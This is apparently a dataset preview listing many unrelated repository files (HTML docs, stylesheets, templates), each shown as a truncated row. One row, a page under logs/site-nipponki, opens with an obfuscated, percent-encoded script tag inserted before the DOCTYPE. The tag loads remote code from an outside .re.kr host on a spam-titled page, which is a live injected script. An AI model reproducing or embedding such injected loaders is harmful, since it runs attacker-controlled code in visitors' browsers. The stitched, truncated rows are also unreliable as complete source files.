path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
_variables/user_field_exist.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $user_field_exist</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-...
post.css
jcomeauictx/kybyz
.post { margin: auto; width: 100%; max-aspect-ratio: 1/1; text-align: left; position: relative; } .bottom { bottom: 0; } .top { top: 0; }
src/euphorie/client/resources/oira/help/bg/illustrations/action-plan-action-add-standard-measure.html
euphorie/Euphorie
<!DOCTYPE html> <html class="no-js" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Slips, trips and falls are prevented. | OiRA</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link id="all-styles" rel="stylesheet" ...
templates/login.html
lfritz/script-server
{% extends "base.html" %} {% block main %} <section id="login"> <h1>Log In</h1> {% if error %}<p class="error"><strong>Error:</strong> {{ error }}{% endif %} <form action="{{ url_for('.login') }}" method="post"> <dl> <dt>Username: <dd><input type="text" name="username" autofocus> <dt>Passwo...
doc/allclasses-frame.html
zubidlo/aad_datastructures
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_67) on Mon Oct 27 09:40:38 GMT 2014 --> <title>All Classes</title> <meta name="date" content="2014-10-27"> <link rel="stylesheet" type=...
solutions/yeoman/module/index.html
chancedai/front-end-solutions
<!DOCTYPE HTML> <html lang = "es"> <head> <meta charset = "UTF-8"> <title>Online Store</title> <link rel = "stylesheet" href = "css/styles.css" /> </head> <body> <div id = "main"> <div id = "search-box"> <input id = "search_input" type = "text" name = "q" /> <button id = "search_button">Search</button> ...
Xj3D/docs/arch/vrml_impl/overview.html
Norkart/NK-VirtualGlobe
<HTML> <HEAD> <TITLE>Xj3D VRML Implementation Overview</TITLE> </HEAD> <BODY> <H1 ALIGN="center">Xj3D VRML Implementation Overview</H1> Author: <I>Justin Couch</I><BR> Last updated: <I>$Date: 2001/07/04 11:45:04 $</I><BR> Revision: <I>$Revision: 1.2 $</I> <A NAME="intro"> <H2>Intro</H2> </A> From an application dev...
Coding/W3School/W3CN/www.w3school.com.cn/jquery/traversing_filter.html
platinhom/ManualHom
<!DOCTYPE html> <html lang="zh-cn"> <!-- Mirrored from www.w3school.com.cn/jquery/traversing_filter.asp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 02:48:15 GMT --> <head> <meta charset="utf-8" /> <meta name="robots" content="all" /> <meta name="author" content="w3school.com.cn" /> <link rel="stylesh...
package/net-cgi/src/usr/www/help/_coax_settings_help.html
jameshilliard/WM2500RP-V1.0.0.34_gpl_src
$h_coax
src/database/entities/EventLog.html
novaris/novoscan
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Hibernate Mappings - Entity Info</title> <link rel="stylesheet" type="text/css" href="../assets/doc-style.css" title="Style"/> </head> <body> <div id="header"> <di...
Coding/W3School/W3CN/www.w3school.com.cn/tiy/t8a3f.html
platinhom/ManualHom
<!DOCTYPE html> <html lang="zh-cn"> <!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=xdom_doc_xmlencoding by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:57:14 GMT --> <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack --> <head> <meta...
Starting/src/main/webapp/static/leap-userguide/8/8.4.html
lionets/Starting
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title>塔机动态管理系统</title> <!-- CSS ...
doc/html/java/healpix/core/test/class-use/HighResolution.html
orlanthi/healpix
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_65) on Fri Dec 05 16:00:20 CET 2014 --> <TITLE> Uses of Class healpix.core.test.HighResolution </TITLE> <META NAME="date" CONTENT="2014-12-05"> <LI...
_layouts/default.html
oplatek/oplatek.github.io
<!DOCTYPE html> <html lang="en"> {% include head.html %} <body> <div class="container content"> <header class="masthead"> <h3 class="masthead-title"> <a href="{{ site.baseurl }}/" title="Home">{{ site.title }}</a> <span class="masthead-title-right"> {% for page...
sites/all/libraries/openlayers3/apidoc/ol.style.Text.html
ps-intelegencia-analytics/testRepo
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>OpenLayers 3 API Reference - Class: Text</title> <script src="scripts/prettify/prettify.js"> </script> <script src="scripts/prettify/lang-css.js"> </script> <script src="scripts/jquery.min.js"> </script> <!--[if lt IE 9]> ...
tests/BOM/assets/css/gui.css
WestpacCXTeam/GUI_text-styling
/*!_colors v3.0.0*/ /* * SETTINGS */ /*!_fonts v2.0.3*/ /* * SETTINGS */ /* * SETTINGS */ @font-face { font-family: 'korolev-w01-cmp-bold'; src: url('../font/a0d7267a-60f5-405d-9c00-645ad5e3ab49.eot'); src: url('../font/a0d7267a-60f5-405d-9c00-645ad5e3ab49.eot?#iefix') format('embedded-opentype'), ...
doc/developer/phpOpenFW/Form_Engine/_core---structure---forms---complex---cga.class.php.html
cclark61/phpOpenFW
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- template designed by Marco Von Ballmoos --> <title>Docs for page cga.class.php</title> ...
index.html
TuxUbuntu/webmst
<html off-manifest="/manifest.cache"> <head> <title>WEBMST</title> <link rel="stylesheet" type="text/css" href="/test/qunit-1.15.0.css"> </head> <body> <h1 id="qunit-header">QUnit Test WebMST</h1> <h2 id="qunit-banner"></h2> <div id="qunit-testrunner-toolbar"></div> <h2 id="qunit-userAgent"></h2> <ol i...
test/input5/in_413-3.html
geoffmcl/tidy-test
<tbody> <tr> <td>R1C1 black</td> <td> <style> .red { color: red; } </style> <span class="red">R1C2 red</span></td>
webroot/yaml/print/print_100_draft.css
xemle/phtagr
@charset "UTF-8"; /** * "Yet Another Multicolumn Layout" - (X)HTML/CSS Framework * * (en) print stylesheet * (de) Druck-Stylesheet * * @copyright Copyright 2005-2007, Dirk Jesse * @license CC-A 2.0 (http://creativecommons.org/licenses/by/2.0/), * YAML-C (http://www.yaml.de/en/lic...
Coding/W3School/W3CN/www.w3school.com.cn/tiy/t504b.html
platinhom/ManualHom
<!DOCTYPE html> <html lang="zh-cn"> <!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=html_tables3 by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 00:32:07 GMT --> <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack --> <head> <meta charset...
wp-content/plugins/khan-exercises/khan-exercises/exercises/same_side_exterior_angles_2.html
lakefernmontessoriacademy/LFMA-Wordpress
<!DOCTYPE html> <html data-require="math graphie graphie-helpers angles"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Same side exterior angles 2</title> <script src="../khan-exercise.js"></script> </head> <body> <div class="exercise"> <div class="vars"> ...
srcjs/stendhal/ui/stendhal-buddylist/stendhal-buddylist.html
acsid/stendhal
<link rel="import" href="../../../lib/polymer/polymer.html"> <dom-module id="stendhal-buddylist"> <link rel="stylesheet" href="stendhal-buddylist.css"> <template> <div id="buddyList"> <ul> <template is="dom-repeat" items="[[buddies]]"> <li class$="[[item.status]]">[[item.name]]</li> </template...
wp-content/themes/VGC/css/styles.css
lamquoctuan/vgc-ws
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not recei...
21082014/source/xamarin/Components/googleplayservices-18.0.0.1/lib/android/18/content/google-play-services/docs/reference/com/google/android/gms/plus/model/moments/MomentBuffer.html
apead/CTXUG
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width" /> <link rel="shortcut icon" type="image/x-icon" href="../../../../../../../../favi...
tests/samples/misc/testMetaXUACompatibleIE.html
buffer/thug
<html> <meta /> <meta http-equiv="" /> <meta http-equiv="X-UA-Compatible" /> <meta http-equiv="X-UA-Compatible" content="IE=7,9,10;FF=3;OtherUA=4" /> <body> Test <script> alert(document.documentMode); </script> </body> </html>
doc/pair_lj96_cut.html
browndeer/lammps-ocl
<HTML> <CENTER><A HREF = "http://lammps.sandia.gov">LAMMPS WWW Site</A> - <A HREF = "Manual.html">LAMMPS Documentation</A> - <A HREF = "Section_commands.html#comm">LAMMPS Commands</A> </CENTER> <HR> <H3>pair_style lj96/cut command </H3> <H3>pair_style lj96/cut/gpu command </H3> <P><B>Syntax:</B> </P> <PRE>pai...
code/common/src/main/resources/com/agnie/gwt/common/client/widget/back/PageTitleCss.css
Agnie-Software/3a
/******************************************************************************* * Copyright (c) 2014 Agnie Technologies. * All rights reserved. This program and the accompanying materials * are made available under the terms of the GNU Public License v3.0 * which accompanies this distribution, and is available at * ht...
assets/css/style-min.css
helgatheviking/sazerac
button,input[type="button"],input[type="reset"],input[type="submit"],button{-webkit-appearance:none;-moz-appearance:none;-ms-appearance:none;-o-appearance:none;appearance:none;-webkit-font-smoothing:antialiased;background-color:#477dca;border-radius:3px;border:0;color:#fff;cursor:pointer;display:inline-block;font-famil...
_posts/2013/2013-09-12-narrative-workflow-topics-helping-users-connect-the-dots-among-topics.html
tomjohnson1492/tomjohnson1492.github.io
--- layout: post title: 'Narrative Workflow Topics: Helping Users Connect the Dots Among Topics' date: 2013-09-12 21:10:26.000000000 -07:00 categories: - findability tags: [] status: publish published: true --- <p>I'm continuing my series of posts addressing why users can't find information in help and what to do abou...
css/OLD/metroStyleFooter.3.css
ahmedmusawir/metro
#footer_content { padding-top: 50px; } #footer_row_1 { height: 150px; /*border: 1px solid yellow;*/ } #footer_row1_col1 { border-bottom: 2px solid skyblue; padding-bottom: 2em; } #footer_row1_col1 img { border: 4px solid white; } #footer_row1_col2 { padding-bottom: 1.8em; /*border-bottom: 2px solid rgba(22,36,...
user_guide/libraries/benchmark.html
maellakhua/museum_guide_server
<<<<<<< HEAD <!DOCTYPE html> <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]--> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Benchmarking Class &mdash; CodeIgn...
modules/mod_cpcloud/css/cpcloud.css
arnouteveraert/ridouani
/** * Custom Properties for Joomla! 1.5.x * @package Custom Properties * @subpackage Modu cp_cloud * @version 1.98 * @revision $Revision: 1.3 $ * @author Andrea Forghieri * @copyright (C) Andrea Forghieri, www.solidsystem.it * @license http://www.gnu.org/licenses/old-licenses/gpl-2.0.html GNU/GPL version 2 */ div.cpclo...
catkin_ws/Reports/BOLD vs SIFT=0?BOLD-SIFT-5fold-all-10%/duct_tape/duct_tape2.html
MarcGroef/ros-vision
<!DOCTYPE html> <html> <h1>duct_tape2</h1> <p> BOLD: 0/1 correct and 1/1false</p> <p> SIFT: 0/1 correct and 1/1false</p><br> <img src = "../../../BVD_M01/duct_tape/duct_tape2.jpg" alt = "duct_tape2.html" style= " width:320px;height:240px;"> <h1> Falsely compared to: </h1><br> <img src = "../../../BVD_M01/plastic_mug/p...
notebooks/pt/c03zombie/s02datasource/s01jogo/Tratamento_16.html
santanche/java2learn
<!DOCTYPE html> <html> <head> <meta charset="utf-8"/> <title>Tratamento 16</title> <meta name="description" id="description" content="[Presentation]"/> <link title="Standard Stylesheet" rel="stylesheet" type="text/css" href="css/standard.css"> <link title="Standard Stylesheet" rel="stylesheet" type="text...
pmo2016/templates/pmo2016/register/stall/information.html
sunoru/pokemon_only
<h3>基本信息</h3> <div id="error-message-information"> <p id="error-information" class="error-message-text"></p> </div> <form id="seller-input" action="{% url 'stall:seller' %}" method="post" onsubmit="return false;"> <h4>【社团资料】</h4> <div class="controls-group oneline-group"> <label class="form-label" f...
sites/all/modules/devel/krumo/docs/classtrees_Krumo.html
liangtwin/drupal7
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- template designed by Marco Von Ballmoos --> <title></title> <link rel="stylesh...
opentech/apply/funds/templates/funds/includes/rendered_answers.html
OpenTechFund/WebApp
{% load wagtailusers_tags workflow_tags %} <h3>Proposal Information</h3> <div class="grid grid--proposal-info"> <div> <h5>Requested Funding</h5> {{ object.get_value_display }} </div> <div> <h5>Project Duration</h5> {{ object.get_duration_display }} </div> <div> ...
components/com_virtuemart/assets/css/vm-ltr-site.css
thumbs-up-sign/TuVanDuAn
.productdetails-view .spacer-buy-area{ padding-left: 16px; } .back-to-category { float: right; } .product-neighbours{ color: #777; margin: 0 0 16px; } .product-neighbours a.next-page{ background: url(../images/vmgeneral/next_16x16.png) no-repeat right; padding-right: 30px; line-height: 20px; float: r...
datasets/java/suicide_attacks/docs/src-html/corgis/suicide_attacks/domain/Attack.html
RealTimeWeb/datasets
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>Source code</title> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <div class="sourceContainer"> <pre><span class="sourceLineNo">0...
public/views/slide/docker/slides.html
bmcivor/Getting-Started-Exp
<div class="modal-header"> <button type="button" class="close" ng-click="modal.dismiss('I quit, im outta here')" aria-hidden="true">&times;</button> <h2>Configure Docker</h2> </div> <div class="modal-body"> <div> <div class="breadcrumb"> <a class="breadcrumb_anchor " ng-click="modal.setC...
sourceryvsipl++-2.3/share/doc/sourceryvsipl++/api-reference/Scopes/vsip/impl/Unary_op_count.Lexpr-op-Sqrt.cT.R.html
maxywb/vsipl
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <!-- Scopes/vsip/impl/Unary_op_count.Lexpr-op-Sqrt.cT.R.html --> <!-- this view was generated by...
Joomla-Administrator/com_menus/_administrator---components---com_menus---helpers---menus.php.html
asika32764/Joomla-CMS-API-Document
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- template designed by Marco Von Ballmoos --> <title>Docs for page menus.php</title> <...
app/styles/adminstyle.css
DogF/limepreguntas
/*** Minimized/Maximized Toolbar ***/ .cke_minimized .cke_break, .cke_minimized .buttonSpan-1, .cke_minimized .buttonSpan-2, .cke_minimized .buttonSpan-3, .cke_minimized .buttonSpan-4, .cke_minimized .buttonSpan-6, .cke_minimized .buttonSpan-7, .cke_minimized .buttonSpan-8, .cke_minimized .buttonSpan-9, .cke_minimized...
layouts/content-sidebar.css
dhornbein/Foundations
/* Theme Name: Foundations Layout: Content-Sidebar */ .content-area { float: left; margin: 0 -25% 0 0; width: 100%; } .site-content { margin: 0 25% 0 0; } .site-main .widget-area { float: right; overflow: hidden; width: 25%; } .site-footer { clear: both; width: 100%; }
lucene-5.1.0/docs/analyzers-common/org/apache/lucene/analysis/hi/class-use/HindiStemmer.html
marcialhernandez/TecnologiasWeb
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_67) on Thu Apr 09 10:31:52 MDT 2015 --> <meta http-equiv="Content-Type" content="text/html" charset="utf-8"> <title>Uses of Class org.a...
_functions/set_message.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Function Reference: set_message()</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-prin...
sites/all/themes/omega/omega/css/layouts/golden/golden.layout.css
AlexandreDelienne/SiteDafy
/******************************************************************************* * golden.layout.scss * * Styling of the "Golden" layout demonstrating the golden rule and asymmetric * grids with Singularity. ******************************************************************************/ .panel-display--golde...
docs/snap_ga/html/BitBltColorPattBM.html
OS2World/DEV-UTIL-SNAP
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta name="Generator" content="ReWorX 1.1 (021204) - http://www.republic...
html/prophetcpustat_8cc_source.html
qixianbd/prophet_vmips_wqm_v131130
<!-- This comment will put IE 6, 7 and 8 in quirks mode --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>prophetcpus...
admin/client/admin_users_online.html
jankei/dominus
<template name="adminUsersOnline"> {{#if currentUser.admin}} <div id="admin_container"> {{> admin_menu}} <table class="table table-striped table-condensed"> <thead> <tr> <td></td> <td>idle</td> <td>last activity</td> <td>last login</td> <td>user id</td> </tr> </...
rezerviTable/yui/docs/YAHOO.util.ComparisonFailure.html
utilo-web-app-development/REZERVI
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>API: yuitest YAHOO.util.ComparisonFailure (YUI Library)</title> <link rel="stylesheet" type="text/css" href="assets/api.css"> <script type="text/javascript" src="assets/api-js"></script> <script ...
CodenameOne/javadoc/com/codename1/io/services/CachedData.html
skyHALud/codenameone
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_04) on Wed Jul 02 15:54:00 IDT 2014 --> <title>CachedData (Codename One API)</title> <meta name="date" content="2014-07-02"> <link rel=...
html/views/commit/index.html
hardlynoticable/gitx
<html> <head> <title>Diff for file</title> <link rel="stylesheet" href="../../css/GitX.css" type="text/css" media="screen" title="no title" charset="utf-8"> <script src="../../lib/GitX.js" type="text/javascript" charset="utf-8"></script> <script src="../../lib/md5.js" type="text/javascript" charset="utf-8"></script...
_site/the-us-economy-in-15-graphs/index.html
milesgrimshaw/milesgrimshaw.github.io
<!doctype html> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--> <!--[if (IE 7)&!(IEMobile)]><html class="no-js lt-ie9 lt-ie8" lang="en"><![endif]--> <!--[if (IE 8)&!(IEMobile)]><html class="no-js lt-ie9" lang="en"><![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en"><!--<!...
external-libs/weka-stable-3.6/doc/weka/associations/GeneralizedSequentialPatterns.html
powdream/manage_movie_files
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_43) on Tue Dec 15 22:06:33 NZDT 2015 --> <TITLE> GeneralizedSequentialPatterns </TITLE> <META NAME="date" CONTENT="2015-12-15"> <LINK REL ="stylesh...
_variables/user_db_config.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $user_db_config</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-pr...
index.html
kpuertas3004/SSSIFANB
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>SSSIFANB - Login</title> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <link rel="stylesheet" href="bootstrap/css/bootstrap.min.css"> ...
WebContent/localdata/North America/San Blas Islands_35.html
onwebbe/travelplan
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="google-site-verification" content="DVVM1p1HEm8vE1wVOQ9UjcKP--pNA...
client/src/modules/stock/entry/modals/findTransfer.modal.html
IMA-WorldHealth/bhima-2.X
<form name="FindForm" ng-submit="$ctrl.submit(FindForm)" novalidate> <div class="modal-header space-between"> <div class="headercrumb"> <i class="fa fa-search"></i> <span translate>FORM.LABELS.SEARCH</span> <span translate>STOCK.ENTRY_TRANSFER</span> </div> <div class="toolbar...
wp-content/themes/banana-smoothie/rtl.css
yondri/newyorkando
/* Theme: Banana Smoothie RTL: Yoav Farhi, yoav@automattic.com */ /* main document style */ body { direction:rtl; unicode-bidi:embed; background-image: url("images/body-background-rtl.png"); background-position:right top; } /* some common and default styles */ blockquote { margin: 5px 5px 5px 25x; pa...
doc/emacs/emacs_41.html
alji2106/CS1300Terminal
<!-- This HTML file has been created by texi2html 1.27 from emacs.texi on 3 March 1994 --> <TITLE>GNU Emacs Manual - Key (Character) Index</TITLE> <P>Go to the <A HREF="emacs_40.html">previous</A>, <A HREF="emacs_42.html">next</A> section.<P> <H1><A NAME="SEC400" HREF="emacs_toc.html#SEC400">Key (Character) Index...
source/Testing Code/Java Test code/JavaDoc/javadoc/deprecated-list.html
ClarkRobotics/NASACompetition
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.4.2_15) on Thu Feb 27 13:46:22 MST 2014 --> <TITLE> Deprecated List </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="stylesheet.css" TITLE="Style...
logs/site-nipponki/02021638148.html
ForAEdesWeb/AEW25
<script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×...
openb3d.mod/html/class_geosphere-members.html
DruggedBunny/openb3d.mod
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
Documentacion/html/inherits.html
tonihr/pyGeo
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
Daboia/target/pit-reports/201503180515/com.github.tilastokeskus.daboia.core.game/GameHandlerController.java.html
tilastokeskus/Daboia
<html> <head> <style type='text/css'> html, body, div, span, p, blockquote, pre { margin: 0; padding: 0; border: 0; outline: 0; font-weight: inherit; font-style: inherit; font-size: 100%; font-family: inherit; vertical-align: baseline; } body{ line-height: 1; color: black; background: white; margin-left: ...
themeforest-5194599-flat-kit-premium-bootstrap-3-app-template/html/admin/light-menus/fluid-layout/dropdown-left-fixed-top-fixed/maps_google.html
dlamprea/door_learning
<!DOCTYPE html> <!--[if lt IE 7]> <html class="ie lt-ie9 lt-ie8 lt-ie7 fluid top-full menuh-top sidebar sidebar-full sidebar-dropdown sidebar-width-mini sidebar-hat"> <![endif]--> <!--[if IE 7]> <html class="ie lt-ie9 lt-ie8 fluid top-full menuh-top sidebar sidebar-full sidebar-dropdown sidebar-width-mini sidebar-ha...
samples/dhtmlxCarousel/03_integration/06_in_window.html
casser/dhx
<!DOCTYPE html> <html> <head> <title>Attach to window</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=edge"/> <link rel="stylesheet" type="text/css" href="../../../codebase/fonts/font_roboto/roboto.css"/> <link rel="stylesheet" type="text/...
catkin_ws/Reports/BOLD vs SIFT=0?BOLD-SIFT-5fold-all-10%/rainbow_projector/rainbow_projector5.html
MarcGroef/ros-vision
<!DOCTYPE html> <html> <h1>rainbow_projector5</h1> <p> BOLD: 0/1 correct and 1/1false</p> <p> SIFT: 0/1 correct and 1/1false</p><br> <img src = "../../../BVD_M01/rainbow_projector/rainbow_projector5.jpg" alt = "rainbow_projector5.html" style= " width:320px;height:240px;"> <h1> Falsely compared to: </h1><br> <img src =...
catkin_ws/Reports/less-cans-20f-10%/electronics_set/electronics_set0.html
MarcGroef/ros-vision
<!DOCTYPE html> <html> <h1>electronics_set0</h1> <p>0/2 correct and 2/2false</p><br> <img src = "../../../BVD_M01/electronics_set/electronics_set0.jpg" alt = "electronics_set0.html" style= " width:320px;height:240px;"> <h1> Falsely compared to: </h1><br> <img src = "../../../BVD_M01/usb_hub/usb_hub11.jpg" alt = "BVD_M...
myodd/boost/doc/html/boost/accumulators/as_featu_idm45443679451936.html
FFMG/myoddweb.piger
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>Struct as_feature&lt;tag::mean_of_weights(immediate)&gt;</title> <link rel="stylesheet" href="../../../../doc/src/boostbook.c...
doc/SimbaKeywordsChangedGetResponse_8cpp.html
sd44/TaobaoCppQtSDK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
themeforest-5194599-flat-kit-premium-bootstrap-3-app-template/html/admin/light-menus/fluid-layout/only-top-fixed/image_crop.html
dlamprea/door_learning
<!DOCTYPE html> <!--[if lt IE 7]> <html class="ie lt-ie9 lt-ie8 lt-ie7 fluid top-full menuh-top"> <![endif]--> <!--[if IE 7]> <html class="ie lt-ie9 lt-ie8 fluid top-full menuh-top"> <![endif]--> <!--[if IE 8]> <html class="ie lt-ie9 fluid top-full menuh-top"> <![endif]--> <!--[if gt IE 8]> <html class="animation...
templates/xtc5/stylesheet.css
tisoft/xtcmodified
/* ----------------------------------------------------------------------------------------- $Id:stylesheet.css 1262 2005-09-30 10:00:32Z mz $ xtcModified - community made shopping http://www.xtc-modified.org Copyright (c) 2010 xtcModified -----------------------------------------------------...
giac/giac-1.2.1/doc/fr/cascmd_fr/cascmd_fr311.html
hiplayer/giac
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <META name="GENERATOR" content="hevea 1.10"> <LINK rel="stylesheet" type="text/css" href="cascmd_fr.css"> <TITLE>Rasse...
boost/doc/html/boost_asio/reference/basic_datagram_socket/native_non_blocking/overload3.html
geodynamics/gale
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>basic_datagram_socket::native_non_blocking (3 of 3 overloads)</title> <link rel="stylesheet" href="../../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.76.1"> <link...
logs/site-nipponki/02021843201.html
ForAEdesWeb/AEW25
